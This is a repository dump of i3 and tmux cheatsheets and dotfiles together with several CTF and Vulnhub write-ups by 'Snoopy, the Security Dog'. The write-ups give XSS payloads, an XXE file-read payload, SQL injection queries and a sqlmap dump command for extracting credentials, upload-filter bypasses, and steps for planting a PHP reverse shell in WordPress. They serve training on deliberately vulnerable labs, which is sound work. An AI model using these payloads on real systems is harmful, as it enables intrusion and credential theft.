 5 | Ctrl+W	Closes the current tab.
 6 | Spacebar	Moves down a page at a time.
 7 | Shift+Spacebar	Moves up a page at a time.
 8 | Alt+Left Arrow	Back a page.
 9 | Alt+Right Arrow	Forward a page.
10 | Ctrl+O	Open a file in the browser.
11 | Ctrl+Tab Change tab
12 | Ctrl+W Close tab
13 | 


--------------------------------------------------------------------------------
/cheatsheets/i3.md:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ### Workspace
 4 | ```
 5 | mod + number      (selection of workspace)
 6 | mod + enter       (open terminal)
 7 | mod + d           (start launcher)
 8 | mod + shift + q   (terminate = ALT F4)
 9 | ctrl + d          (hangup, exit, logout)
10 | mod + shift + r   (restart i3)
11 | mod + shift + e   (exit i3, back to login screen)
12 | ```
13 | 
14 | ### Window creation
15 | ```
16 | mod + h (horizontal mode) 
17 | mod + v (vertical mode)
18 | ```
19 | 
20 | ### Window Selection
21 | ```
22 | mod + ⬅ 
23 | mod + ⬆
24 | mod + ⬇
25 | mod + ➡
26 | ```
27 | 
28 | ### Window Arrangement (move)
29 | 
30 | ```
31 | mod + shift + ⬅ 
32 | mod + shift + ⬆
33 | mod + shift + ⬇
34 | mod + shift + ➡
35 | ```
36 | 
37 | 
38 | ### Windows View (split, tab, stack, float)
39 | 
40 | ```
41 | mod + w (tab)
42 | mod + f (fullscreen enter & leave)
43 | mod + s (stacked)
44 | mod + e (split)
45 | mod + shift + space (floating)
46 | ```
47 | 
48 | 
49 | ### Font Size in Terminal (alacritty)
50 | 
51 | ```
52 | ctrl + (increase font)
53 | ctrl - (smaller font)
54 | ```
55 | 


--------------------------------------------------------------------------------
/ctf writeups/2014-09-01-ISC-Challenge-2014.markdown:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "ISC Challenge 2014"
 4 | subtitle:   "Web application challenge"
 5 | date:       2014-09-01-01 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/b_1.png"
 8 | ---
 9 | 
10 | <h2>Challenge 1 : Bypassing Authentication.</h2>
11 | 
12 | <p>When logging into the sandbox, a user is left with a login page that takes the value 'username' and 'passwd' and uses as part of authentication.</p>
13 | 
14 | <p>Upon closer analysis, the application was found to be taking and serialising the authentication credentials  using the  JSON.stringify() in a client-side javascript file. The values are then sent using the following JSON format.</p>
15 | 
16 | <blockquote>{"protocol":"http","state":"CREDENTIALS_SENT","auth":"2fa","alg":"password_nonce","addr":"login.php",<br>"session":"","balancing":"auto"}</blockquote>
17 | 
18 | <p>Entering invalid credentails will be checked by the server which will return the following base-64 encoded string.</p>
19 | 
20 | <blockquote>{"protocol":"http","state":"RECEIVED_CREDENTIALS_ARE_INVALID","auth":"2fa","alg":"password_nonce","addr":"null",<br>"session":"null","balancing":"auto"}</blockquote>
21 | 
22 | <p>The vulnerability in this challenge lies in the clientside validation of the username and password values.  The base-64 encoded string response returned by the application is being validated by Jauth.js.</p>
23 | 
24 | <p>By using any browser developer tools or proxies, a user can modify the clientside script that is validating the response. </p>
25 | 
26 | <img alt="" src="http://snoopythesecuritydog.github.io/img/isc1.png"/>
27 | 
28 | <p>The Jauth.js is analysing the application's response data for validation. </p>
29 | 
30 | <img alt="" src="http://snoopythesecuritydog.github.io/img/isc2.png" />
31 | <p>Using Burp Suite Incerception and JS-Beautifier plugin to modify the response.</p>
32 | 
33 | <p>It will  only move to the next part of the 2 factor authentication if certain conditions are met. Changing the "RECEIVED_CREDENTIALS_ARE_VALID" condition to "RECEIVED_CREDENTIALS_ARE_INVALID" and vice-versa will successfully bypass the first stage of authentication.</p>
34 | 
35 | <h2>Challenge 2 : Possible XML External Entity Injection </h2>
36 | 
37 | <p>The second part of the challenge is using XML format to submit data from the client to the application  If a user enters a nonce value, the client will send it through the request for the server to process.</p>
38 | 
39 | 
40 | <img alt="" src="http://snoopythesecuritydog.github.io/img/isc3.png"/>
41 | <p>The enternal value is encoded into the <nonce> tag and send to the server.</p>
42 | 
43 | <p>By looking at the server response, an XML External Entity  vulnerability seems like the logical attack vector since the server is returning a 404 response code. The application is processing and searching for the value given by the user. This type of functionality usually allows the use of entity references. </p>
44 | 
45 | 
46 | 
47 | <br><p>To test for XXE, the following payload can be added to the request <p>
48 | 
49 | <blockquote><?xml version="1.0" encoding="utf-8"?>
50 | <!DOCTYPE root [
51 | <!ENTITY xxe SYSTEM "file:///[path to wini.ini or boot.ini ]">
52 | ]>
53 | <user><nonce>&xxe;</nonce><policy>
54 | </blockquote>
55 | 
56 | 
57 | 
58 | 
59 | 
60 | 


--------------------------------------------------------------------------------
/ctf writeups/2014-10-24-google-xss-challenge.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "Google XSS Challenge -  Solutions"
 4 | subtitle:   "Solutions to Google's online XSS Challenge"
 5 | date:       2014-10-24 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/post-bg-06.jpg"
 8 | ---
 9 | 
10 | 
11 | 
12 | <p>Link: <a href="https://xss-game.appspot.com/">Link to XSS Challenge</a></p>
13 | 
14 | <p>The Google XSS challenge is a 6 level game on executing XSS in different contexts. I found this challenge useful due to the actual code being shown so a player can get better understanding on how to execute different XSS payloads.</p>
15 | 
16 | 
17 | <h2 class="section-heading"> Level 1: Hello, world of XSS</h2>
18 | 
19 | <p>This level was easy. All a challenger has to do is input a payload into the query parameter.</p>
20 | 
21 | <blockquote><svg/onload=alert(9)></blockquote>
22 | 
23 | <p>I like to use the svg tag since it is rarely used and is shorter than most payloads.</p>
24 | 
25 | <h2 class="section-heading"> Level 2: Persistence is key</h2>
26 | 
27 | <p> Level 2 is also pretty easy.  The payload inputted by the user is rendered back in a blockquote.  	
28 | 
29 | <blockquote>&quot;&gt;<svg/onload=alert(9)></blockquote>
30 | 
31 | <h2 class="section-heading"> Level 3: That sinking feeling…</h2>
32 | 
33 | <p>In the level, the image loaded on the page uses the window.location.hash javascript property. This can be confirmed by looking at the provided source code. This can be exploited by adding the following<p>
34 | 
35 | <blockquote>1.jpg' onload='javascript:alert(1);'</blockquote>
36 | 
37 | 
38 | <h2 class="section-heading"> Level 4: Context matters</h2>
39 | 
40 | In this example, the time variable is reflected back within an existing script tag. This means that there is no need to breakout of the tag. The following payload can be used to execute JavaScript </p>
41 | 
42 | <blockquote>");alert(1);//</blockquote>
43 | 
44 | <h2 class="section-heading">Level 5: Breaking protocol</h2>
45 | 
46 | <p> In this example, the input is reflected back inside a href tag. The following payload can be used to execute alert to pass this challenge </p>
47 | 
48 | <blockquote>javascript:alert(1);</blockquote>
49 | 
50 | 
51 | <h2 class="section-heading">Level 6: Follow the rabbit</h2>
52 | 
53 | <p> This challenge was quite tricky. To break out of this context, a challenger can use the data URI to execute an alert.<p> 
54 | 
55 | <blockquote>data:text/javascript,alert(1);</blockquote>
56 | 
57 | <p> Thanks for reading my write-up. The challenge is still open so have a try. Furthermore, I recently did a talk on XSS and different contexts; this presentation can be found <a href="http://www.slideshare.net/snoopythesecuritydog/xss-primer-snoopysecurity">here</a></p>


--------------------------------------------------------------------------------
/ctf writeups/2015-01-11-C-Sharp-VulnSoap.markdown:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "Csharp - VulnSoap"
 4 | subtitle:   "A Vulnhub web application challenge"
 5 | date:       2015-01-11 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/b_1.png"
 8 | ---
 9 | 
10 | <h2>Vulnhub Challenge: Csharp -VulnSoap</h2>
11 | <p>VulnSoap is a purposefully vulnerable SOAP service with backend PostgreSQL database.  The application is written in the C# programming language and uses apache+mod_mono to run. The application is mainly focused on SQL injections but it’s still interesting.
12 | I started by mapping with the application with Burp Suite and spidering to get access to all pages. Browsing to the web application directly will give the VulnerableService’s service page. 
13 | The application also reveals its WSDL file which can be parsed to make requests to the client.  Looking at the methods and its input types can give you a good idea of what the application is processing. Using this service, it is possible to create a user, query his password and delete him. </p>
14 | 
15 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/vulnsoap1.png"/>
16 | 
17 | <p>There are several publicity available tools that can be used to parse XML to create requests. This includes
18 | <li>SoapUI</li>
19 | <li>Wsdler Burp plugin</li>
20 | <li>SOA Client firefox plugin</li>
21 | I used SOA Client to parse the WSDL file and create requests. This can then be intercepted using Burp Suite and used in Intruder or repeater.</p>
22 | 
23 | <strong>Methods available:</strong>
24 | <li>AddUser – Create a user. </li>
25 | <li>ListUsers – List all users available in the database. </li>
26 | <li>GetUser – Get a users password from the given username value. </li>
27 | <li>DeleteUser – Delete a user</li>
28 | 
29 | <h2>Username Enumeration</h2>
30 | <p>Since the webservice has a GetUser method publicly available, this can be used to enumerate through a list of users to find any users available on the web service. This can be done by using Burp Intruder.</p>
31 | 
32 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/vulnsoap2.png"/>
33 | 
34 | 
35 | <h2>SQL Injection</h2>
36 | <p>Since all methods are vulnerable to error based SQL Injection, let’s try and exploit one manually. The getuser method seems like a good choice since it is in a select statement.
37 | <blockquote> select GetUserResult from vulnerableDB where username=’userinput’ </blockquote>
38 | To identify a SQL Injection, you can try to input a single or a double quote to break the SQL syntax.</p>
39 | 
40 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/vulnsoap3.png"/>
41 | 
42 | <p>To conduct more recon to understand the back-end database, you can use the union operator. The SQL UNION operator combines the result of two or more SELECT statements. Using this, an attacker can start select data from other tables.
43 | 
44 | <strong>foo' union select user,current_database()-- </strong><br>
45 | This will give you the user the database is running as and the current database it is retrieving data from. In this case, the user is called ‘postgres ‘and the database is ’ vulnerable’.
46 | To start extracting data from the database, you will first need to know all available tables and columns. This can be found by querying the database’s information_schema. A database’s information schema provides information about all of the tables, views, columns, and procedures in a database.
47 | <strong>snoopy' union select COLUMN_name,table_name from information_schema.columns--</strong>
48 | 
49 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/vulnsoap4.png"/>
50 | 
51 | 
52 | Now you can start looking for interesting table_name by using the where clause. 
53 | <strong>snoopy' union select COLUMN_name,table_name from information_schema.columns where table_name!='routines’--  </strong>
54 | This technique can be used multiple times to add column names you already retrieved.
55 | <strong>where table_name='users' and column_name!='password'  AND column_name!='confrelid'-- </strong>
56 | Using this SQL statement, it was possible to enumerate through different records and find a table called users.
57 | <strong>snoopy' union select username,password from users-- </strong></p>
58 | 
59 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/vulnsoap5.png"/>
60 | 
61 | <p>SQL Injection Wiki: <a href="http://www.sqlinjectionwiki.com/Categories/4/postgresql-sql-injection-cheat-sheet/">Link</a></p>
62 | <h2>Automating with SQLmap</h2>
63 | <p>The exploitation of this vulnerability can be automated using Sqlmap. Sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in python.
64 | To exploit this vulnerability using Sqlmap, first take the raw request and save it in a text file. Now, try the following Sqlmap command.
65 | <blockquote>sqlmap -r savedrequest.txt -p username --dbms=PostgreSQL  --dump</blockquote>
66 | 
67 | <li>--dbs - To get all available database</li>
68 | <li>-D - database name </li>
69 | <li>-T - table name</li>
70 | <li>--tables  - To get all tables in a database</li>
71 | <li>--columns  -  to get all columns</li>
72 | <li>--technique=U uses union technique</li>
73 | </p>
74 | 


--------------------------------------------------------------------------------
/ctf writeups/2015-02-20-TopHatSec-Freshly.markdown:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "TopHatSec : Freshly"
 4 | subtitle:   "A VulnHub VM challenge created by TopHatSec"
 5 | date:       2015-02-20 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/post-bg-02.jpg"
 8 | ---
 9 | 
10 | <a href="https://www.vulnhub.com/entry/tophatsec-freshly,118/">Link to Challenge</a>
11 | 
12 | <p>This is a boot to root vm challenge written by TopHatSec. Here are my solutions to the challenge. I started by portscanning the virtual machine with nmap</p>
13 | 
14 | 
15 | <blockquote>nmap -A 192.168.0.12</blockquote>
16 | 
17 | <p>which gave me results indicating port 80 was open. I opened up Burp Suite and started mapping the application with content discovery.</p>
18 | 
19 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/freshly1.png" />
20 | 
21 | <p>This led me to the login page. Since I don’t have any credentials, I tried sql injection. It is obvious that the application is vulnerable to a blind SQL injection.</p>
22 | 
23 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/freshly2.png" />
24 | 
25 | <p>So I enumerated all the databases looking for user credentials to the previously found phpadmin page or the login page which is vulnerable to SQL injection.</p>
26 | 
27 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/freshly3.png" />
28 | 
29 | 
30 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/freshly4.png" />
31 | 
32 | <p>
33 | These credentials didn’t work for both login pages. So I was stuck for a while.
34 | </p><br>
35 | 
36 | <p>So I initialised a full dump of the database and looked for clues. I found a database called <strong>wordpress8080</strong>; so it is possible that the virtual machine is running wordpress as well. This can be found using a full port scan.</p>
37 | 
38 | <blockquote>nmap -p 1-65535 –sV -sT -T4 192.168.0.12</blockquote>
39 | 
40 | <p>This led me to port 8080 open on the application which leads to a Wordpress installation.</p>
41 | 
42 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/freshly5.png" />
43 | 
44 | <p>Since we already have an exploitable SQL injection vulnerability, we can use this to look for WordPress admin credentials. This can be found under table users in the worpress8080 database.<p>
45 | 
46 | <li>Username : admin</li>
47 | <li>Password : SuperSecretPassword</li>
48 | 
49 | <p>
50 | Now that you have admin privileges, you can just edit of the existing WordPress pages with a PHP reverse shell. This will then be processed and will make a connection back your listener.
51 | </p>
52 | 
53 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/freshly6.png" />
54 | <br>
55 | 
56 | <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell">PHP Reverse Shell from pentestmonkey</a><br>
57 | 
58 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/freshly7.png" />
59 | 
60 | <p>It is also possible to add a vulnerable plugin and get a shell that way.</p>
61 | 
62 | 


--------------------------------------------------------------------------------
/ctf writeups/2015-02-20-TopHatSec-Zors.markdown:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "TopHatSec : Zorz"
 4 | subtitle:   "A VulnHub File Upload challenge created by TopHatSec"
 5 | date:       2015-02-15 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/post-bg-03.jpg"
 8 | ---
 9 | 
10 | <a href="https://www.vulnhub.com/entry/tophatsec-zorz,117/">Link to Challenge</a>
11 | 
12 | <p>ZORZ is another VM created by TopHatSec. This vm involves three malicious file upload challenges.  The challenger will need find ways to bypass different filters to execute system commands on the server. 
13 | I started by port scanning the application with Nmap.
14 | </p>
15 | <blockquote>nmap -A 192.168.0.15</blockquote>
16 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz1.png" />
17 | <p>The results indicate port 22 and 80 open. Let’s get started with the application</p>
18 | 
19 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz2.png" />
20 | 
21 | <p>I started by uploading a basic shell which as successful. But, I had trouble finding the upload location. I used the Burp content discovery function to find any hidden directories but this was unsuccessful. </p>
22 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz4.png" />
23 | 
24 | <p>However, I was able to find the uploads directories using custom word lists. </p>
25 | <blockquote>wfuzz -c -z file, /fuzzdb/Discovery/PredictableRes/raft-small-directories-lowercase.txt --hc 404 http://192.168.0.15/FUZZ</blockquote>
26 | 
27 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz3.png" />
28 | 
29 | <p>A directory called uploads1 and uploads2 exists and I am able to execute a shell</p>
30 | 
31 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz5.png" />
32 | 
33 | <h3>Level 2</h3>
34 | <p>Level 2 seems to checking the file extension of the uploaded file.</p>
35 | 
36 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz6.png" />
37 | 
38 | 
39 | <p>
40 | I first tried to bypass this filter by using double extensions. For example, if the application is looking for file image.png. A malicious user can upload a file with double extensions such as image.php.png. This is then process and rendered by the server. But, this didn’t work.
41 | I then tried to add php code to a png image with the double extension; this was successfully accepted by the application.<br>
42 | I used the following reverse shell for the upload : <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell">PHP Reverse Shell</a>
43 | </p>
44 | 
45 | 
46 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz7.png" />
47 | 
48 | 
49 | 
50 | <h3>Level 3</h3>
51 | 
52 | <p>The Level 3 of the application seems to have a similar sort of check for file uploads. Any invalid format returns an error.</p>
53 | 
54 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz8.png" />
55 | 
56 | <p>To bypass this, I used the same payload from level 2 but I changed the content type to <strong>Content-Type: image/jpeg</strong>. This was accepted by the server as a valid format. </p>
57 | 
58 | 
59 | <img alt="" src="http://snoopythesecuritydog.github.io/img/ssrf/zorz9.png" />
60 | 
61 | 
62 | 


--------------------------------------------------------------------------------
/ctf writeups/2016-07-26-ABCTF-L33t-H4xx0r-2016.markdown:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "ABCTF2016 – L33t H4xx0r"
 4 | subtitle:   "PHP comparisons"
 5 | date:       2016-07-26 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/abcd/0003.png"
 8 | ---
 9 | 
10 | <h2>ABCTF2016 – L33t H4xx0r</h2>
11 | 
12 | 
13 | <p>Another interesting challenge from ABCTF2016. The user is provided with a login page. The user will need to login with the correct credentials to get the flag.
14 | 
15 | <br>
16 | 
17 | The source code of the page hints at source.txt available which can be viewed through URL browsing.
18 | 
19 | 
20 | <img alt="" src="http://snoopythesecuritydog.github.io/img/abcd/0009.png"/>
21 | 
22 | <br>
23 | 
24 | If we browse the page, we see that the website uses the PHP command <b>strcmp</b> to check if the user’s password is correct.
25 | 
26 | <img alt="" src="http://snoopythesecuritydog.github.io/img/abcd/0011.png"/>
27 | 
28 | 
29 | This is an insecure implementation because of the way PHP comparisons work. PHP variables including class variables get the NULL value and NULL type by default. So if no value is set by the password parameter, the value will remain to be NULL. Furthermore, the source code wants the password value to return true through and NULL == 0 will return true. So, this can be used to bypass the login page.
30 | <br>
31 | 
32 | 
33 | 
34 | After some research, I found that an empty array can be used to get the flag <b>abctf{always_know_whats_going_on}.</b>
35 | 
36 | <blockquote>http://url/?password[]=foo</blockquote> 
37 | 
38 | <img alt="" src="http://snoopythesecuritydog.github.io/img/abcd/0010.png"/>
39 | 
40 | 
41 | PS: If you have to check for unused variables (or for “NULL”-ness of a variable) you should always use the triple equal operator (===) with NULL token. Otherwise you may mistakenly treat not NULL things like ‘0’ or empty string (“”) as null that may have been valid data for your application.
42 | 
43 | </p>
44 | 


--------------------------------------------------------------------------------
/ctf writeups/2016-07-26-ABCTF-Reunion-2016.markdown:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "ABCTF-2016 - Reunion Solution"
 4 | subtitle:   "SQLi Challenge"
 5 | date:       2016-07-26 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/abcd/0003.png"
 8 | ---
 9 | 
10 | <h2>ABCTF-2016 - Reunion Solution</h2>
11 | 
12 | <p>This challenge involved retrieving and flag using SQL injection.
13 | 
14 | By looking at the page, it is obvious that the application is vulnerable to SQL injection. This can be confirmed by inputting </b> 2 OR 1=1--</b> in the id parameter.
15 | <br>
16 | <img alt="" src="http://snoopythesecuritydog.github.io/img/abcd/0001.png"/>
17 | 
18 | 
19 | More enumeration can be conducted using the UNION statement:
20 | 
21 | <blockquote>1 UNION SELECT 1,1,1,1</blockquote>
22 | 
23 | This was used to find out the numbers of columns. Furthermore, the union statement can be used to find other information regarding the datbase using the following variables:
24 | 
25 | <ul>
26 |   <li> Version : SELECT VERSION()</li>
27 |   <li> User details: user()</li>
28 | <li> Database details : SELECT db_name(); SELECT database();</li>
29 | <li> Server details : SELECT @@hostname;</li>
30 |  </ul>
31 | 
32 | Using these information, we can find out the current table used by the database.
33 | 
34 | <blockquote>2 UNION SELECT table_name,1,1,1 from information_schema.tables where table_schema = database()</blockquote>
35 | 
36 | <img alt="" src="http://snoopythesecuritydog.github.io/img/abcd/0002.png"/>
37 | 
38 | Using these information, we can find out the current table used by the database.
39 | 
40 | <blockquote>2 UNION SELECT table_name,1,1,1 from information_schema.tables where table_schema = database()</blockquote>
41 | 
42 | Using this query, you can get the tablename which is <br>w0w_y0u_f0und_m3</b>. This query can then be used to get the column name.
43 | 
44 | <br>
45 | <blockquote>
46 | union select column_name,1,1,1 from information_schema.columns where table_name = 0x7730775f7930755f6630756e645f6d33.0x7730775f7930755f6630756e645f6d33 
47 | </blockquote>
48 | 
49 | The table name is the hex encoded value of the table name which was found perviously. This is necessary since this is integer based SQL Injection.
50 | 
51 | Using this, you can query and get the flag
52 | 
53 | </blockquote>abctf{uni0n_1s_4_gr34t_c0mm4nd}</blockquote>
54 | 
55 | <br>
56 | 
57 | 
58 | <img alt="" src="http://snoopythesecuritydog.github.io/img/abcd/0004.png"/>
59 | 
60 | </p>
61 | 


--------------------------------------------------------------------------------
/dotfiles/i3/config:
--------------------------------------------------------------------------------
  1 | # Mod1 = alt
  2 | # Mod4 = win
  3 | 
  4 | set $mod Mod1
  5 | 
  6 | # Fonts =============================================================================
  7 | 
  8 | #font pango:Terminus 8     # Terminus - Low DPI
  9 | #font pango:Inconsolata 8  # Inconsolata - Low DPI
 10 | #
 11 | #font pango:Terminus 8     # Terminus - Low DPI
 12 | font pango:Inconsolata 16  # Inconsolata - High DPI
 13 | 
 14 | # Binds =============================================================================
 15 | 
 16 | # Script to rename workspaces with a key-press
 17 | bindsym $mod+r exec "~/.resources/rename-i3-workspace.sh"
 18 | 
 19 | # Borders  ==========================================================================
 20 | 
 21 | # Set border colours and so on
 22 | #              border       background   text           indicator   child border
 23 | client.focused #ff0000      #000000      #ffffff        #ffffff     #999999
 24 | 
 25 | # Set the border width
 26 | new_window pixel 1
 27 | 
 28 | # Gaps ==============================================================================
 29 | 
 30 | ## Set the gaps around windows
 31 | gaps inner 20 # Low DPI
 32 | gaps outer 9 # Low DPI
 33 | #gaps inner 30 # High DPI
 34 | #gaps outer 25 # High DPI
 35 | 
 36 | # Miscellaneous =====================================================================
 37 | 
 38 | 
 39 | # Don't automatically focus on wherever the mouse is
 40 | focus_follows_mouse no
 41 | 
 42 | # I don't remember
 43 | smart_borders on
 44 | 
 45 | 
 46 | # Use Mouse+$mod to drag floating windows to their wanted position
 47 | floating_modifier $mod
 48 | 
 49 | # start a terminal
 50 | bindsym $mod+Return exec --no-startup-id termite
 51 | bindsym $mod+d      exec --no-startup-id rofi -show run
 52 | 
 53 | # kill focused window
 54 | bindsym $mod+Shift+q kill
 55 | 
 56 | # change focus
 57 | bindsym $mod+j focus down
 58 | bindsym $mod+k focus up
 59 | bindsym $mod+l focus right
 60 | bindsym $mod+h focus left
 61 | 
 62 | # alternatively, you can use the cursor keys:
 63 | bindsym $mod+Left focus left
 64 | bindsym $mod+Down focus down
 65 | bindsym $mod+Up focus up
 66 | bindsym $mod+Right focus right
 67 | 
 68 | # move focused window
 69 | bindsym $mod+Shift+j move down
 70 | bindsym $mod+Shift+k move up
 71 | bindsym $mod+Shift+l move right
 72 | bindsym $mod+Shift+h move left
 73 | 
 74 | # alternatively, you can use the cursor keys:
 75 | bindsym $mod+Shift+Left move left
 76 | bindsym $mod+Shift+Down move down
 77 | bindsym $mod+Shift+Up move up
 78 | bindsym $mod+Shift+Right move right
 79 | 
 80 | bindsym $mod+v split toggle
 81 | #bindsym $mod+semicolon split h
 82 | #bindsym $mod+v split v
 83 | 
 84 | # enter fullscreen mode for the focused container
 85 | bindsym $mod+f fullscreen toggle
 86 | 
 87 | # change container layout (stacked, tabbed, toggle split)
 88 | bindsym $mod+s layout stacking
 89 | bindsym $mod+w layout tabbed
 90 | bindsym $mod+e layout toggle split
 91 | 
 92 | # toggle tiling / floating
 93 | bindsym $mod+Shift+space floating toggle
 94 | 
 95 | # change focus between tiling / floating windows
 96 | bindsym $mod+space focus mode_toggle
 97 | 
 98 | # focus the parent container
 99 | bindsym $mod+a focus parent
100 | 
101 | # focus the child container
102 | #bindsym $mod+d focus child
103 | 
104 | # switch to workspace
105 | bindsym $mod+1 workspace number 1
106 | bindsym $mod+2 workspace number 2
107 | bindsym $mod+3 workspace number 3
108 | bindsym $mod+4 workspace number 4
109 | bindsym $mod+5 workspace number 5
110 | bindsym $mod+6 workspace number 6
111 | bindsym $mod+7 workspace number 7
112 | bindsym $mod+8 workspace number 8
113 | bindsym $mod+9 workspace number 9
114 | bindsym $mod+0 workspace number 10
115 | 
116 | # move focused container to workspace
117 | bindsym $mod+Shift+1 move container to workspace number 1
118 | bindsym $mod+Shift+2 move container to workspace number 2
119 | bindsym $mod+Shift+3 move container to workspace number 3
120 | bindsym $mod+Shift+4 move container to workspace number 4
121 | bindsym $mod+Shift+5 move container to workspace number 5
122 | bindsym $mod+Shift+6 move container to workspace number 6
123 | bindsym $mod+Shift+7 move container to workspace number 7
124 | bindsym $mod+Shift+8 move container to workspace number 8
125 | bindsym $mod+Shift+9 move container to workspace number 9
126 | bindsym $mod+Shift+0 move container to workspace number 10
127 | 
128 | # reload the configuration file
129 | bindsym $mod+Shift+c reload
130 | # restart i3 inplace (preserves your layout/session, can be used to upgrade i3)
131 | bindsym $mod+Shift+r restart
132 | # exit i3 (logs you out of your X session)
133 | bindsym $mod+Shift+e exec "i3-nagbar -t warning -m 'You pressed the exit shortcut. Do you really want to exit i3? This will end your X session.' -b 'Yes, exit i3' 'i3-msg exit'"
134 | 
135 | # resize window (you can also use the mouse for that)
136 | mode "resize" {
137 |         # These bindings trigger as soon as you enter the resize mode
138 | 
139 |         # Pressing left will shrink the window’s width.
140 |         # Pressing right will grow the window’s width.
141 |         # Pressing up will shrink the window’s height.
142 |         # Pressing down will grow the window’s height.
143 |         bindsym h resize shrink width 10 px or 10 ppt
144 |         bindsym j resize grow height 10 px or 10 ppt
145 |         bindsym k resize shrink height 10 px or 10 ppt
146 |         bindsym l resize grow width 10 px or 10 ppt
147 | 
148 |         # same bindings, but for the arrow keys
149 |         bindsym Left resize shrink width 10 px or 10 ppt
150 |         bindsym Down resize grow height 10 px or 10 ppt
151 |         bindsym Up resize shrink height 10 px or 10 ppt
152 |         bindsym Right resize grow width 10 px or 10 ppt
153 | 
154 |         # back to normal: Enter or Escape
155 |         bindsym Return mode "default"
156 |         bindsym Escape mode "default"
157 | }
158 | 
159 | bindsym $mod+y mode "resize"
160 | 
161 | exec vmware-user-suid-wrapper
162 | exec "~/.resources/i3-init.sh"
163 | 


--------------------------------------------------------------------------------
/dotfiles/tmux/tmux.conf:
--------------------------------------------------------------------------------
 1 | # improve colors
 2 | set -g default-terminal 'screen-256color'
 3 | 
 4 | # act like vim
 5 | setw -g mode-keys vi
 6 | bind-key h select-pane -L
 7 | bind-key j select-pane -D
 8 | bind-key k select-pane -U
 9 | bind-key l select-pane -R
10 | bind-key -r C-h select-window -t :-
11 | bind-key -r C-l select-window -t :+
12 | 
13 | set -g prefix2 C-s
14 | 
15 | # start window numbers at 1 to match keyboard order with tmux window order
16 | set -g base-index 1
17 | set-window-option -g pane-base-index 1
18 | 
19 | # renumber windows sequentially after closing any of them
20 | set -g renumber-windows on
21 | 
22 | # soften status bar color from harsh green to light gray
23 | set -g status-bg '#666666'
24 | set -g status-fg '#aaaaaa'
25 | 
26 | # remove administrative debris (session name, hostname, time) in status bar
27 | set -g status-left ''
28 | set -g status-right ''
29 | 
30 | # increase scrollback lines
31 | set -g history-limit 10000
32 | 
33 | # prefix -> back-one-character
34 | bind-key C-b send-prefix
35 | # prefix-2 -> forward-incremental-history-search
36 | bind-key C-s send-prefix -2
37 | 
38 | # don't suspend-client
39 | unbind-key C-z
40 | 
41 | # Local config
42 | if-shell "[ -f ~/.tmux.conf.local ]" 'source ~/.tmux.conf.local'
43 | 


--------------------------------------------------------------------------------
/dvws/IDOR1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/IDOR1.png


--------------------------------------------------------------------------------
/dvws/IDOR2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/IDOR2.png


--------------------------------------------------------------------------------
/dvws/IDOR3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/IDOR3.png


--------------------------------------------------------------------------------
/dvws/apiexposure.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/apiexposure.png


--------------------------------------------------------------------------------
/dvws/cmdi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/cmdi.png


--------------------------------------------------------------------------------
/dvws/content-type-xss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/dvws/content-type-xss.png


